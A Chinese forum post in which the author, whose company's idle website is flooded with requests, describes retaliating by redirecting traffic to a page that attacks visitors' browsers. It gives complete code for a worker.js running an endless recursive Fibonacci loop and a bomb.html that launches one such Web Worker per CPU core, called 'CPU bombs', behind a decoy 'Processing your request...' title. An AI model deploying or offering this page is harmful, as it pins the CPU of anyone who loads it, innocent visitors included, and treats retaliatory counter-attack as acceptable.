有人持续攻击我们公司的网站

luffy

   公司的空壳网站遭人持续攻击
近30天有40万个IP，高达3700万次的请求




虽然没造成什么影响，但是咱也不惯着他，直接开干。
由于是空壳网站，基本也没什么人访问。直接302重定向到ovh
刚开始是搞了一个1G的文件让他们下载，但是从耗时来看，他们没上当。
那就换一个思路
在ovh那里新建一个worker.js
将以下代码粘贴进去：

1. function fibonacci(n) {
   
2.     if (n <= 1) {
   
3.         return n;
   
4.     }
   
5.     return fibonacci(n - 1) + fibonacci(n - 2);
   
6. }
   
7. 
   
8. // 接收主线程的消息
   
9. self.onmessage = function(e) {
   
10.     // 持续计算，直到被终止
    
11.     while (true) {
    
12.         fibonacci(e.data.n);
    
13.     }
    
14. };

复制代码

这个脚本会持续执行 fibonacci 计算，直到它所在的 Web Worker 线程被终止。
接下来，修改 bomb.html 文件。我们将在这里创建多个 Web Worker 实例，让它们同时开始工作。
将内容替换为以下代码：

1. <!DOCTYPE html>
   
2. <html>
   
3. <head>
   
4.     <title>Processing...</title>
   
5. </head>
   
6. <body>
   
7.     <h1>Processing your request...</h1>
   
8.     <script>
   
9.         // 获取逻辑CPU核心数
   
10.         const numWorkers = navigator.hardwareConcurrency || 4;
    
11.         
    
12.         // 针对每个核心，创建一个Web Worker
    
13.         for (let i = 0; i < numWorkers; i++) {
    
14.             const worker = new Worker('worker.js');
    
15.             // 启动计算任务，参数可以调整，值越大计算越复杂
    
16.             worker.postMessage({ n: 35 });
    
17.         }
    
18. 
    
19.         console.log(`Launched ${numWorkers} CPU bombs.`);
    
20.     </script>
    
21. </body>
    
22. </html>

复制代码

我打开之后，CPU直接100%